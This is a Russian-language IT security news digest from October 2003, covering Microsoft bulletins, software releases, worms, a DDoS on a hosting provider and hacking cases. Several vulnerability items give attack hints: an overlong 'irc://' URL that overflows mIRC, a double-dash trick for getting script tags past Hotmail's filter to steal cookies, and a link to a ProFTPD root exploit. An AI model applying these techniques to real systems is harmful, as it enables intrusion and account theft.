18/10/2003 18:09 Cтатья "Философия и архитектура NT против UNIX с точки зрения безопасности".
На сайте wasm.ru опубликована статья довольно известного в определённых кругах Криса Касперски "Философия и архитектура NT против UNIX с точки зрения безопасности". Автор довольно подробно (и, что особенно приятно, непредвзято) рассматривает архитектуру 2-х систем (понимая под NT не саму ОС Windows NT, а всё семейство на базе ядра NT: NT, 2K и XP), суть анализа которых сводится к извечному вопросу - сравнению защищённости систем с открытым и закрытым кодом. В конце статьи автор делает следующий вывод: "Не правда ли, забавно, – NT защищена намного слабее (приведенная выше таблица неопровержима доказывает это), но ломают чаще всего все-таки UNIX, а не NT. Парадокс? Или все-таки отсутствие исходных текстов дает о себе знать? Во всяком случае, других причин мы просто не видим… Единственное, что можно предположить: NT ломают, но в силу успешности взлома (и уязвимости самой системы) эти взломы просто не удается зафиксировать". Статья - http://www.wasm.ru/article.php?article=unixvsnt
18/10/2003 17:33 Aladdin выпустил новую версию системы защиты конфиденциальной информации.
Компания Aladdin Software Security R.D., разработчик и поставщик систем аутентификации, защиты информации и защиты ПО, объявила о начале продаж системы защиты конфиденциальной информации Secret Disk New Generation 3.1. Система создает на компьютере скрытый защищенный ресурс, в котором в зашифрованном виде хранится конфиденциальная информация. С помощью Secret Disk NG осуществляется защита как виртуальных дисков, так и разделов жестких дисков, а также съемных дисков, томов на динамических дисках. Доступ к секретным данным осуществляется только после того, как пользователь подсоединит в USB-порт электронный ключ eToken и введет PIN-код ключа. В версии 3.1 реализовано несколько принципиальных нововведений. Secret Disk NG версии 3.1 позволяет для защиты информации использовать внешние криптопровайдеры. В частности, теперь можно шифровать информацию по российскому криптографическому стандарту ГОСТ 28147-89, сертифицированному ФАПСИ. В этом случае шифрование осуществляется с помощью криптопровайдера "КриптоПро CSP" версии 2.0, который можно будет приобрести как в составе продукта, так и отдельно. В Secret Disk NG 3.1 реализована поддержка цифровых сертификатов стандарта X.509. Для защиты ключей шифрования могут быть использованы уже имеющиеся у пользователя цифровые сертификаты. На практике это означает, что этот продукт может быть совместим с системами PKI, развернутыми в масшатабах предприятия. У пользователей продукта появилась возможность смены ключей шифрования. Это позволяет сменить алгоритма шифрования минуя процесс расшифрования данных. Источник - http://www.cnews.ru
18/10/2003 17:08 Новый пакет патчей для Windows XP.
15 октября компания Microsoft выпустила новый пакет обновлений для операционной системы Windows XP. Новый пакет получил наименование Update Rollup 1, и является сборником критических заплаток, выпущенных Microsoft после выхода Service Pack 1. В этом отношении Update Rollup 1 уступает сервис-пакам, которые помимо критических исправлений обычно несут в себе более широкий спектр изменений, в частности, поддержку новых компьютерных технологий. Тем не менее, Update Rollup может оказаться полезен тем пользователям, которым не хочется скачивать и устанавливать патчи по одному. Подробности - http://support.microsoft.com/?kbid=826939
18/10/2003 16:42 Выпуск коммерческой версии Kaspersky® Anti-Hacker 1.5.
"Лаборатория Касперского" сообщает о выходе новой версии популярного межсетевого экрана для защиты домашнего компьютера от несанкционированного доступа - Kaspersky® Anti-Hacker 1.5. Программа Kaspersky Anti-Hacker представляет собой персональный межсетевой экран, обеспечивающий полномасштабную защиту Windows-компьютеров от хакерских атак и несанкционированного доступа к данным. Благодаря контролю над всеми сетевыми операциями на компьютере (отслеживание активности приложений, имеющих доступ в интернет, пакетная фильтрация входящих и исходящих данных и пр.) Kaspersky Anti-Hacker обеспечивает конфиденциальность всех хранящихся на ПК данных. В новой версии программного продукта значительно улучшен пользовательский интерфейс, в частности, поддерживающий графическое исполнение программы в стиле XP для компьютеров, работающих под управлением операционной системы Windows XP. Программа стала гораздо более удобной в использовании: упрощен процесс первоначальной настройки, в рамках которого наиболее часто используемым приложениям по умолчанию разрешена сетевая активность в соответствии с их типом, что обеспечивает сохранение уровня защищенности компьютера. Также у пользователя появилась возможность задавать диапазон портов для правил фильтрации пакетов и фильтрации данных на уровне приложений. Эта функция также позволяет задать одно правило для целой группы потенциально опасных IP-адресов. Кроме того, теперь программа способна обнаруживать новые типы сетевых атак (SmbDie и Helkern/Slammer) и поддерживает работу с ADSL-модемами. Подробности - http://www.kaspersky.ru/news.html?id=143582121
17/10/2003 17:50 Обзор инструментария для определения взлома.
На известном сайте securityfocus.com опубликована статья Holt Sorenson, посвящённая обзору инструментария для определения последствий взлома (состоявшегося). Вполне естественно, что после того, как был обнаружен взлом и была ликвидирована его дальнейшая эксплуатация (перекрыт вход взломщика) необходимо определить последствия состоявшегося взлома системы. Для того, чтобы это осуществить, необходимо иметь навыки работы с инстументарием, предназначенным для осуществления аудита. Первая часть этого опуса (по словам автора. состоящего из 3-х частей) была предназначена системным утилитам, вторая часть посвящена инструментарию для работы с файловой системой. Рассматриваются утилиты ОС: OpenBSD 3.2, Debian GNU/Linux 3.0 (woody), RedHat 8.0 (psyche) и Solaris 9. Статья - http://www.securityfocus.com/infocus/1738
17/10/2003 17:22 Восстановление файлов и файловых систем в Linux.
На сайте opennet.ru выложена ссылка на статью "Recovering Linux files and filesystems", которая рассказывает что можно предпринять при крахе файловой системы (ext2, ext3), а также описываются типовые ситуации использование fsck (операции с суперблоком, определение сбойных секторов на диcке, работа с журналом и т.д.), показано как восстановить удаленный файл используя утилиту recover. Статья - http://newsforge.com/newsforge/03/10/08/1416248.shtml
17/10/2003 17:08 Cтатья "Из чьего кармана выходят бесплатные входящие".
На сайте обзора мобильников (www.mobile-review.com) опубликована довольно любопытная статья Сергея Потресова, в которой делается попытка рассмотреть механизм и тенденции введения тарифа бесплатных входящих звонков на мобильные телефоны (что было сделано в Украине). Статья - http://www.mobile-review.com/articles/2003/incoming.shtml
17/10/2003 16:24 Украина: государственный контроль над Интернетом.
Интернет-ассоциация Украины (ИнАУ) пожаловалась ОБСЕ на то, что официальные власти пытаются установить контроль Службы безопасности Украины (СБУ) за всей информацией, которая будет проходить по каналам провайдеров, работающих с госорганами, передает "Интерфакс". Как сообщается в пресс-релизе ИнАУ, 17 июня 2002 года Государственным комитетом связи и информатизации Украины был издан приказ номер 122 "Об утверждении Порядка составления и ведения перечня предприятий (операторов), которые предоставляют услуги по доступу к глобальным сетям передачи данных органам исполнительной власти, другим государственным органам, предприятиям, учреждениям и организациям, которые получают, обрабатывают, распространяют и сохраняют информацию, которая является объектом государственной собственности и охраняется согласно законодательству". Мониторинг интернета, который собираются осуществлять властные структуры в соответствии с этим приказом, по мнению ИнАУ, будет нарушать "конституционные права граждан и основные принципы свободы предпринимательской деятельности". От провайдеров в частности требуется установка спецоборудования, которое бы позволило СБУ осуществлять мониторинг "всей информации, проходящей по их каналам, независимо от того, является ли передаваемая информация собственностью государства или нет". ИнАУ подчеркивает, что такая мера "дает возможность несанкционированного перехвата личной переписки граждан и конфиденциальной коммерческой информации предприятий" и указывает, что это нарушает требования конституции Украины, закона "О предпринимательстве" и других нормативно-правовых актов. Источник - http://www.crime-research.ru
17/10/2003 13:22 Защищенная SIM-карта.
Кажется, SIM-карта полностью справляется со своими обязанностями и новое применение ей найти уже сложно, однако нет – нашли. Предполагается, что новые версии «симок» будут использовать для операции, которым необходимо высокая степень защиты. Именно к таким видам операций относятся электронная торговля и электронные подписи. Уникальность решения в том, что названные операции будут производиться не в терминале и его ОС, а в защищённом от взлома (пока обратное не доказано) модуле SIM-карты, на манер интеллектуальных смарт-карт. Технология использует интерпретатор Java и Java-апплеты, позволяющие операторам и сторонним разработчикам интегрировать защищённые приложения прямо в интеллектуальный модуль SIM-карты, благодаря чему они могут исполняться независимо от терминала и его ОС. Пока дальше проекта дело не ушло, но сама идея заслуживает пристального внимания. Источник - http://www.mobile-review.com
17/10/2003 12:08 Выход Opera 7.21.
После выхода серии бэта-версий вышла финальная (7.21) версия браузера Opera, выпускаемого норвежской компанией Opera Software. Изменений очень много, вот некоторые: поддержка двунаправленного текста, поддержка нового типа url: data (rfc 2397), экспериментальная поддержка ipv6, обнаружение и сообщение о сетевых ошибках, поддержка `windows-like' скина, доработан до примлемого человеческого вида email-клиент, много багфиксов. Подробности - http://www.opera.com/linux/changelogs/721/
17/10/2003 11:33 Подробности о файловой системе Longhorn.
Компания Microsoft поделилась некторыми подробностями относительно новой файловой системы, которая появится в следующей версии Windows с кодовым названием Longhorn. Эта файловая система под названием Windows File System, или WinFS, станет одним из ключевых нововведений в Longhorn. Согласно появлявшейся ранее информации, эта файловая система должна была базироваться на технологиях, созданных для реляционной СУБД SQL Server. На самом деле WinFS будет устроена несколько сложнее. Как рассказал вице-президент Microsoft Боб Маглия в интервью CNET, решения, позаимстованные из SQL Server, не заменят собой нынешнюю файловую систему NTFS, а дополнят ее. WinFS будет строиться поверх NTFS, и NTFS станет частью новой файловой системы. По словам Маглиа, WinFS будет состоять из трех основных компонентов - NTFS, реляционной базы данных и базы данных на основе XML. Все вместе это позволит создать систему, не зависящую от кокретных приложений, отметил Маглиа. С помощью WinFS в Microsoft хотят реализовать универсальный подход к хранению, поиску и извлечению данных. При этом поддержка NTFS позволит сохранить совместимость со старыми приложениями и вычислительными системами, технологии SQL Server послужат для хранения информации в более упорядоченном виде, а посредством XML к файлам можно будет добавлять метаданные, с помощью которых можно дать исчерпывающее описание хранящейся в них информации. Это должно заметно облегчить поиск информации и использование компьютеров конечными пользователями. Подробности - http://news.com.com/2100-1016_3-5090584.html
17/10/2003 11:09 Появление вирусов для мобильных устройств - лишь вопрос времени.
Антивирусные эксперты предупреждают: вместе с развитием функциональности мобильных телефонов и прочих беспроводных устройств связи, вероятность появления на них схожих с современными сетевыми червями вирусов многократно возрастает, сообщает CNN.com. Согласно ожиданиям экспертов, первые подобные вирусы возникнут на новой платформе в течение ближайших двух лет. Как известно, до сих пор не создано абсолютно защищенной от взлома системы, а на последних моделях смартфонов используется мобильная версия печально знаменитой своими "дырами" операционной системы Windows. С широким распространением "умных" подключенных к интернету мобильных устройств наподобие PDA, смартфонов и игровых приставок риск появления вирусов нового поколения становится все больше и больше. Нетрудно себе представить, чем могут быть опасны подобные вирусы. Помимо повреждения хранящейся в памяти мобильных устройств пользовательской информации, они способны полностью "останавливать" работу цифровых мобильных сетей, перегружая своим молниеносным распространением их узкие участки (шлюзы, серверы и пр.). Источник - http://www.viruslist.com
16/10/2003 17:18 Бюллетень CERT об уязвимости в ОС Windows.
Координационный центр CERT (университет Карнеги-Меллона, Питтсбург, США) выпустил бюлетень по безопасности CA-2003-27, в котором описаны уязвимости, о которых сообщалось в бюллетенях Microsoft MS03-41-47. В качестве мер противодействия советуют отключить сервис Messenger и пропатчиться. Подробности - http://www.cert.org/advisories/CA-2003-27.html
16/10/2003 16:19 XP Service Pack 2 выйдет в декабре.
Несмотря на то, что его выпуск планировался не ранее середины следующего года, Microsoft приняла решение об ускорении выпуска SP2 для XP на несколько месяцев. Основной упор в нем делается на безопасность - так, например он по умолчанию включит встроенный в XP файрволл и обеспечит лучший контроль над объектами ActiveX. Подробнее - http://zdnet.com.com/2100-1105_2-5091381.html
16/10/2003 15:10 Октябрьский подарок-2!
М-да... Не успев выпустить 5 бюллетеней подряд, Microsoft Тут же выпустила ещё 2! Выпущены бюллетени MS03-46 и MS03-47. Оба связаны с уязвимостями в Microsoft Exchange. MS03-046 - из-за некорректной обработки SMTP-запроса verb можно вызвать переполнение буфера и, как результат, DoS. Уязвимы Microsoft Exchange 5.5/2000. Для обоих выпущены сервис-паки (SP4 для 5.5, SP3 для 2K). MS03-047 посвящён описанию уязвимости типа кросс-сайтинг в Microsoft Exchange Server 5.5, который может быть выполнен в контексте Outlook Web Access уязвимого сайта. Выпущено исправление. Итак, учитывая, что в году 52 недели, мы уже почти имеем по уязвимости в неделю. Неплохой показатель. Источник - http://www.microsoft.com
16/10/2003 13:50 Октябрьский подарок пользователям Windows от Microsoft!
Вот так вот! Корпорация Microsoft решила не мелочиться, выпуская по бюллетеню каждую неделю, а решила выпускать свои бюллетени оптом. И, следуя такому стахановскому подходу к компьютерной безопасности, выпустила сразу 5 (!) бюллетеней, в которых описываются уязвимости в ОС Windows. Итак, по порядку. Бюллетень MS03-041 - уязвимость в работе технологии Authenticode, ответственной за подтверждение авторства того или иного ActiveX-модуля. В результате можно загрузить ActiveX-код без ведома пользователя. Уязвимы ОС: NT, XP, 2K, 2003. Бюллетень MS02-042 - переполнение буфера в модуле Microsoft Local Troubleshooter (файл Tshoot.ocx). Результат - выполнение кода в системе. ОС: Win2K. Бюллетень MS03-043 - переполнение буфера в службе Messenger. Результат: выполнение кода в системе. Уязвимы: NT, XP, 2K, 2003. Бюллетень MS03-044 - переполнениt буфера в модуле Help and Support Center. Результат - выполнение кода в системе (особеннно опасна в ХР и 2003 - так как через протокол HPC можно удалённо запустить кодв системе). Уязвимы те же ОС, плюс ME. Бюллетень MS03-045 - переполнение буфера при обработке элементов интерефейсов ListBox (поле списка) и ComboBox (комбинированное поле) (уязвимость в библиотеке User32.dll). Результат - локальное повышение привилегий. ОС - NT, XP, 2K, 2003. Подробности - http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/winoct03.asp
16/10/2003 12:13 Серьёзнейшая уязвимость в Hotmail.
Компания Finjan Software (разработчик SurfinGate, SurfinShield Corporate и SurfinGuard Pro) сообщает о серьёзнейшей уязвимости, которая была обнаружена компанией в почтовом Вэб-сервисе Hotmail, поддерживаемым Microsoft. Было обнаружено. что фильтр запросов не до конца проверяет тэги вводимых запросов, и его можно обойти, сформировав в теле запросов перед тэгом двойное "тире" (вида --<LINK (object, iframe), например). Используя подобные запросы, злоумышленник получает возможность: получения cookies Passport/Wallet, автоматичеки (при прочтении письма) запустить вредоносный код, украсть персональные идентификационные данные через подмену окна входа, чтения/изменения информации в персональном почтовом ящике, посылки почтового сообщения от имени другого пользователя. Суть уязвимости заключается в кросс-сайт скриптинге с использованием элементов ActiveX. Microsoft залатала уязвимость на своём сервере, однако технология может быть использована при создании будущих сетевых червей. Компания Finjan решила не публиковать пример эксплоита, однако на сайте выложена страничка для демонстрации уязвимости. Подробности - http://www.finjan.com/mcrc/alert_show.cfm?attack_release_id=89
16/10/2003 10:56 Аппаратные средства защиты от копирования станут обязательными.
Правительство США сделало еще один шаг на пути к появлению персональных компьютеров и других электронных устройств со встроенной защитой от копирования материалов, защищенных авторским правом. Об этом сообщает Washington Post со ссылкой на Федеральную комиссию США по связи (Federal Communications Commission - FCC). Вполне вероятно, что совсем скоро FCC будет требовать от производителей оборудования оснащать новые продукты аппаратными системами защиты от несанкционированного копирования информации. Этот шаг был предпринят под давлением индустрии развлечений, которая чрезвычайно обеспокоена широким распространением цифровых записей фильмов, музыкальных композиций и телепередач. Что касается противников предложенного требования, то они дружно заявляют о том, что внедрение такой технологии обречено на провал. Наибольшую тревогу с их стороны вызывает тот факт, что государству будет дано право контролировать процесс создания компьютеров и других электронных устройств. Работники FCC, пожелавшие остаться неизвестными, сообщили прессе, что детали о новом стандарте broadcast flag появятся к концу месяца. Broadcast flag получил свое название от бита компьютерного кода, встраиваемого в сигналы цифрового телевидения, которые будут считываться принимающими устройствами. Если постановление войдет в силу, то потребителям цифрового контента придется переходить на использование новой техники. Подробности - http://www.washingtonpost.com/wp-dyn/articles/A32173-2003Oct15.html
15/10/2003 17:56 Уязвимость состояния операции в Microsoft Windows в обработке RPC-запросов.
Уязвимость состояния операции обнаружена ISS X-Force при обработке входящих RPC запросов. Удаленный пользователь может послать несколько специально сконструированнных RPC-запросов, чтобы заставить 2 потока обработать один и тот же RPC запрос. В результате удаленный атакующий может аварийно завершить работу RPC-службы и перезагрузить операционную систему. Эксплуатация уязвимости для выполнения произвольного кода по словам X-Force затруднительна. Однако, как стало известно SecurityLab, существует рабочий эксплоит, который с вероятностью 5-10% компрометирует уязвимую систему. Уязвимости подвержены по прежнему ОС WinXP/2K. Патча пока не существует, однако сама X-Force выпустила Virtual Patch for the Microsoft RPC, кроме того, напомним, что недавно мы анонсировали утилиту под названием DCOM Bobulator, предназначенную для отключения сервиса DCOM RPC (в 95% случаев ненужного пользователям). Подробное описание - http://www.securitylab.ru/40801.html
15/10/2003 17:22 Спецслужбы технически не могут контролировать SMS.
Вслед за операторами мобильной связи правоохранительные органы категорически опровергли саму возможность отслеживания SMS-сообщений. "Отслеживание SMS-сообщений невозможно ни по правовым, ни по техническим, ни по экономическим аспектам", - заявил журналистам начальник первой оперативно-розыскной части криминальной милиции ГУВД столицы Дмитрий Чепчугов. Ранее "Столичная вечерняя газета" опубликовала материал, в котором сообщила, что российские службы будут контролировать тексты SMS, пересылающихся посредством мобильных телефонов. Специально для этого был якобы подготовлен список слов и выражений, использование которых в SMS вызывает подозрение. SMS со словами из "черного списка" не будут доходить до адресата, что должно помочь обеспечить безопасность в городе. По данным издания, сообщения, которые содержат эти фрагменты, будут записываться в базу данных операторов сотовой связи, а потом передаваться работникам спецслужб. Комментируя это сообщение, Н.Чепчугов отметил, что "на каждый контроль сообщения необходима судебная санкция, при этом обязательно в известность ставится оператор сотовой связи". Кроме того, он подчеркнул, что для эффективного отслеживания миллионов SMS-сообщений необходимо столько же приемников-перехватчиков. Подробности - http://www.rian.ru/rian/intro.cfm?nws_id=449114
15/10/2003 17:04 Новая версия персональной поисковой системы SimSearch.
Как нам сообщил Гусев М.Н., выпущена новая версия 2.0 поисковой программы-препроцессора SimSearch для Win-95/98. Программа выполняет мгновенный поиск по ключевым словам, фразам в текстовых документах, документах MS Word, Excel, файлах Acrobat Reader (pdf). Дополнительные возможности: поиск по интервалу дат, поиск слов с опечатками (нечеткий поиск). Объём архива - 500 КБ. Сайт проекта - http://gusev.inp.kz
15/10/2003 16:41 Вышел Mandrake 9.2.
Вышла очередная версия довольно популярного дисрибутива Linux - Mandrake 9.2. ISOшники доступны для BitTorrent-скачивания членам клуба. Остальные могут насладиться деревом пакетов (raw tree) или подождать до конца октября, когда образы появятся на ftp-зеркалах. Подробности - http://www.linux-mandrake.com/en
15/10/2003 16:27 Выход Mozilla 1.5.
Сегодня вышла новая версия браузера Mozilla. Из улучшений: проверка орфографии в Mail/News/Composer, улучшения в Composer, улучшения в tabbed browsing, другие улучшения, затрагивающие JavaScript console, просмотр исходного текста страницы, исправления ошибок при работе под Windows. Подробности - http://www.mozilla.org/releases/mozilla1.5/README.html
15/10/2003 16:13 Внимание! Червь I-Worm.Sexer.
"Лаборатория Касперского" сообщает об обнаружении нового интернет-червя, распространяющегося посредством электронной почты. I-Worm.Sexer не использует никаких брешей в защите почтовых программ и активизируется только в случае открытия пользователем зараженного вложения. Червь использует старый, давно апробированный механизм психологического воздействия на пользователей: вложенный файл называется sex.exe, а в качестве темы письма используется фраза "посмотри, какая прелесть!))" - выводы делайте самостоятельно. Схожими "запрещенными приемами" пользовался уже не один десяток email-червей. Интересны выводимые I-Worm.Sexer сообщения: "Битва за Москву! Герман Стерлигов против урючья". Согласно новостям Lenta.ru, Герман Стерлигов сегодня зарегистрировался кандидатом на предстоящих 7 декабря выборах мэра Москвы. "Черный пиар" в действии? Для детектирования и лечения I-Worm.Sexer уже выпущено срочное обновление вирусных баз "Антивируса Касперского". Источник - http://www.viruslist.ru
15/10/2003 15:21 Microsoft выпустила инструменты разработки для Office.
В понедельник Microsoft выпустила набор инструментов разработки для создания ПО и сервисов, интегрированных с новой версией Office. Visual Studio Tools for Microsoft Office System предназначена для разработчиков, использующих инструменты Visual Studio .Net для создания специальных приложений, интегрированных с Office System — новой версией комплекса офисных приложений Microsoft. В Office System, которая должна выйти на следующей неделе, войдут усовершенствованные версии знакомых приложений, таких как Word и Excel. Кроме того, система будет содержать новые продукты: программу создания электронных форм InfoPath, средства коллективной работы SharePoint и др. Наиболее важные изменения в Office связаны с добавлением поддержки Extensible Markup Language (XML), все более популярного стандарта обмена данными между компьютерными системами. Функциональность XML позволит компаниям связать веб-сервисы с приложениями Office и обеспечить связь между документами Office и корпоративными вычислительными ресурсами. Однако, чтобы воспользоваться преимуществами XML-функций Office, такими как связь с корпоративными базами данных или веб-сервисами, разработчикам придется писать специальные инструменты. Источник - http://www.zdnet.ru
15/10/2003 15:08 Отчет: бурный рост интернета чреват вредителями.
Как сообщила в понедельник компания VeriSign, за прошедший год степень использования интернета заметно увеличилась, но вместе с этим усугубились и цифровые угрозы — такие как непрошеная электронная почта и мошенничество в сфере электронной коммерции. Согласно исследованию VeriSign, которая изучает данные о работе интернета, несколько индикаторов сетевого трафика демонстрируют рост. Количество запросов к системе обслуживания доменных имен (DNS) VeriSign за первую неделю августа увеличилось на 50% по сравнению с тем же периодом прошлого года, а количество операций поиска в DNS для электронной почты — на 245%. По словам Кена Сильвы, вице-президента VeriSign по информационной безопасности, большая часть этого прироста вызвана незатребованными массовыми рассылками — или спамом. «Объем деятельности в интернете продолжает расти, но опасная активность нарастает быстрее, — говорит он. — В августе мы наблюдали небывалый рост числа инцидентов, вызванных главным образом нарушением безопасности». VeriSign располагает уникальным обзором интернета, так как занимается очень многими аспектами функционирования Сети. Компания обслуживает базы данных реестров доменов верхнего уровня .com и .net. А ее «дочка» Network Solutions является регистратором, то есть предоставляет услуги по резервированию доменных имен. Кроме того, секьюрити-фирма предлагает услуги цифровой подписи веб-сайтам и предприятиям, помогая им повысить степень безопасности электронной коммерции и транзакций business-to-business. Еще одна служба электронной коммерции VeriSign занимается обработкой кредитных карт. Подробности - http://zdnet.com.com/2100-1105_2-5090328.html
15/10/2003 14:15 В Windows Server 2003 добавят сонар и ультразвук.
Компания Microsoft поедлилась планами по выпуску обновлений для операционной системы Windows Server 2003. Как рассказал изданию CRN менеджер по планированию Microsoft Майкл Гулд. Уже до конца нынешнего года Microsoft намерена реализовать поддержку двух технологий, названных Sonar и Ultrasound, которые призваны повысить эффективность процесса репликации файлов в сложных и неоднородных информационных системах. Кроме того, в нынешнем квартале будут выпущены новые службы Windows SharePoint Services (WSS), Security Configuration Wizard и обновление, реализующее поддержку стандарта iSCSI. Источник - http://www.sysadmins.ru
14/10/2003 15:42 Омский хакер попал под две статьи.
Неправомерный доступ к компьютерной информации и причинение имущественного ущерба собственнику путем обмана, - такие два преступления инкриминированы 19-летнему студенту Омского государственного университета. Решение суда - 18 месяцев условно. Уголовное дело, которое рассмотрел Советский районный суд Омска, было возбуждено в апреле этого года региональным управлением ФСБ. Студент ОГУ путей сообщения, 'используя специализированные программы, осуществил неправомерный доступ к компьютерной информации ряда организаций и скопировал их регистрационный данные, предназначенные для подключения к сети Интернет'. В результате кражи паролей пострадали 12 организаций Омска, а также ряд частных лиц, сообщает РИА "Новости". Источник - http://www.rian.ru
14/10/2003 14:38 Зенон Н.С.П. подвергся DDoS-атаке.
10 октября один из крупнейших хостеров Рунета подвергся распределенной атаке. В результате проблем у "Зенона" в течение некоторого времени был затруднен доступ к целому ряду сайтов, в числе которых Газета.Ру. Как сообщила служба эксплуатации сети Zenon/Internet, 10.10.2003 в 12:56 началась распределенная атака (DDoS) на ресурсы сети "Зенон Н.С.П.", в следствие чего был затруднен доступ к виртуальным www- и почтовым серверам. "Основные источники атаки были оперативно выявлены и зафильтрованы нашими техническими специалистами, благодаря чему в 13:30 был в полном объеме восстановлен доступ к почтовым серверам, а в 14:27 был восстановлен доступ к виртуальным www-серверам из большинства российских сетей. 11.10.2003 в 14:30 восстановлен полный доступ из всех сетей". Трудности в работе "Зенона" ощущаются и в данный момент. "В настоящее время затруднен доступ к ресурсам виртуального хостинга сети Зенон Н.С.П. Технический персонал работает над устранением проблемы", - говорится в сообщении службы эксплуатации". Источник - http://www.runet.ru
14/10/2003 14:20 Xprobe2 версии 0.2.
Ofir Arkin, основатель группы Sys-Security Group, объявил одоступности версии 0.2 программного продукта Xprobe2, который представляет собой инструмент для активного определения типа операционной системы на основании "отпечатков" (fingerprints) оной. Судя по всему, этот сканер представляет собой не сканер, который сверяет результаты сканирования на разного рода типы пакетов с заданной базой данных, а сканер с так называемой "нечёткой логикой" (fuzz), который делает вывод о типе ОС удалённой системы на основании анализа поведения ОС. В новой версии добавлено: автоматическая генерация сигнатур, формирование выходных данных в XML, метод определения "отпечатков" удалённой ОС на основании анализа временных отпечатков TCP (впервые был представлен на Blackhat USA 2003). Xprobe2 - http://www.sys-security.com/archive/tools/xprobe2/xprobe2-0.2.tar.gz
14/10/2003 13:02 Эксплоит уязвимости ProFTPD.
Carl Livitt из Великобритании опубликовал эксплоит уязвимости, которая недавно была обнаружена в довольно популярном FTP-клиенте ProFTPD. Эксплоит использует уязвимость в неверном разборе символов "\n" в ProFTPd 1.2.7 - 1.2.9rc2 (испытывался на SuSE 8.0/8.1 & RedHat 7.2 and 8.0). Позволяет удалённо получить суперпользователя и обойти ограничения chroot - оболочки. Эксплоит - http://www.securityfocus.com/archive/1/341106/2003-10-11/2003-10-17/0
14/10/2003 12:30 Уязвимость в mIRC.
1dt.w0lf сообщает о наличии уязвимости в популярном IRC-клиенте mIRC. Запрос к URL irc://irc.hackme.com в браузере приведет к запуску программы и попытке подключения к irc.hackme.com. Переполнение буфера обнаружено при вводе чрезмерно длинной строки в урле типа irc:// регистрируемом при установке mIRC в системе. Удаленный атакующий может сформировать специальный URL, при вызове которого произойдет переполнение буфера. Пример: irc://[buffer]...... где buffer >998 байт. Атакующий может также получить доступ к системе если сможет заставить пользователя загрузить специально сформированную ссылку. Следовательно, атакующий может выполнить произвольный код в системе с текущими привилегиями пользователя. Уязвимость устранена в mIRC 6.11. Источник - http://www.securiteam.com/windowsntfocus/6M00B0U8KE.html
14/10/2003 11:25 Вышла новая версия антивируса Dr.Web для Unix-систем.
Компания "ДиалогНаука", занимающаяся разработками в области безопасности компьютерных систем, объявила о выходе новой версии - 4.30 - антивирусной программы Dr.Web для Linux, FreeBSD, OpenBSD, Solaris (x86), а также МСВС 3.0. По отношению к предыдущему релизу (4.29.2), в этой версии внесены множество дополнений и исправлений. Среди общих нововведений следует отметить, что были изменены пути установки антивируса для BSD-систем, расширены параметры для проверки архивных файлов. Например, добавлен параметр, который задает максимально допустимую вложенность архивов, а также реализована проверка LZH-архивов. Кроме того, исправлены ошибки при обработке повреждённых и зашифрованных RAR-архивов, а также недочеты, приводившие к "падению" программы на повреждённых PowerPoint-контейнерах. Касаясь отдельных модулей программы, разработчики отмечают, что изменен параметр командной строки, задающий проверяемый путь в сканирующем модуле Dr.Web, и исправлены ошибки при работе с системным логом. Внешний антивирусный фильтр, демон DrWebD теперь может использовать TCP- и UNIX-сокеты одновременно, при этом количество используемых сокетов принципиально неограничено. Подробности - http://www.dials.ru/inf/news.php?id=484
14/10/2003 11:03 Британец Аарон Кеффри отвергает обвинения в хакерстве.
Аарон Кеффри, девятнадцатилетний житель английского графства Дорсет отвергает предъявленные ему обвинения в компьютерном взломе. Кеффри был арестован еще в прошлом году по подозрению в организации и проведении атаки на компьютерные системы хьюстонского порта (Хьюстон, Техас, США). Атака была осуществлена в сентябре 2001 года и привела к временному выходу из строя сервера, использовавшегося для координации движения кораблей по фарватеру и акватории порта. Кеффри не признает себя виновным в организации атаки. По его словам, его просто подставили. Атака действительно была осуществлена с помощью его домашнего компьютера, но сам Кеффри не имеет к ней никакого отношения. Его компьютер просто захватили неизвестные хакеры, решившие свалить ответственность за свои преступления на невиновного человека. Кеффри отметил, что на момент атаки его компьютер был слабо защищен, и хакерам не составило никакого труда захватить управление ПК и использовать его в своих целях. Источник - http://www.compulenta.ru
14/10/2003 10:10 Шаг на пути к повышению безопасности системы Windows Server.
Новое направление в защите серверов, согласно программе Securing The Perimeter, включает основные обновления для системы Windows Server с целью противодействия атакам на серверы компаний. По словам Боба Маглиа, вице-президента отдела корпоративного менеджмента Microsoft, компания предпринимает значительные меры для повышения безопасности инфраструктуры Windows. Маглиа не стал вдаватся в подробности данной программы, однако заявил, что необходимо создать инфраструктуру для патч-менеджмента. Основное обновление системы, сделанное Службой апгрейда программного обеспечения (Software Update Service) поможет администраторам в более доступной форме использовать патчи для серверов, работающих на базе Windows 2000/2003, а также для ПК на базе Windows XP Professional. Маглиа также заявил, что Microsoft намеревается по умолчанию задействовать Windows Internet Connection Firewall (ICF) в системе Windows XP. Одной из причин для принятия такого решения послужило то, что компьютеры, на которых был включен ICF, не пострадали от вируса Blaster во время эпидемии летом 2003 года. Подробности - http://www.itnews.com.au/storycontent.asp?ID=10&Art_ID=15716
13/10/2003 19:03 Вышла Mozilla 1.4.1.
Новый стабильный релиз браузера Mozilla. Из нововведений/исправлений: поддержка NTLM аутентификации в версии для Windows; переработан механизм bookmarks; сomposer поддерживает теперь "click and drag" динамических картинок и таблиц; улучшена usability функции junk-mail в мейлере и блокировки pop-up окон и картинок в браузере; возможность настройки индивидуальных стартовых страниц раздельно для первого окна, нового окна и нового таба; множественное исправление ошибок. Подробности - http://www.mozilla.org/releases/mozilla1.4.1/
13/10/2003 18:19 Переполнение буфера в Windows Message Queuing Service.
Как сообщает Securitylab.ru, уязвимость обнаружена в Windows 2000. Удалённый злоумышленник может скомпрометировать уязвимую систему. Уязвимость связанна с ошибкой проверки границ в Microsoft Message Queuing Service ("mqsvc.exe") при обработке критериев поиска в "MQLocateBegin"-пакетах. В результате злоумышленник имеет возможность послать чрезмерно длинную, специально обработанную структуру к параметру "pRestriction", чтобы вызвать переполнение динамической памяти. Уязвимости подвержены: Microsoft Windows 2000 Advanced Server Microsoft Windows 2000 Datacenter Server, Microsoft Windows 2000 Professional, Microsoft Windows 2000 Server. Лечится инсталляцией SP4. Подробнее - http://www.securitylab.ru/40759.html
13/10/2003 17:37 В Windows встроят улучшенную поддержку Wi-Fi.
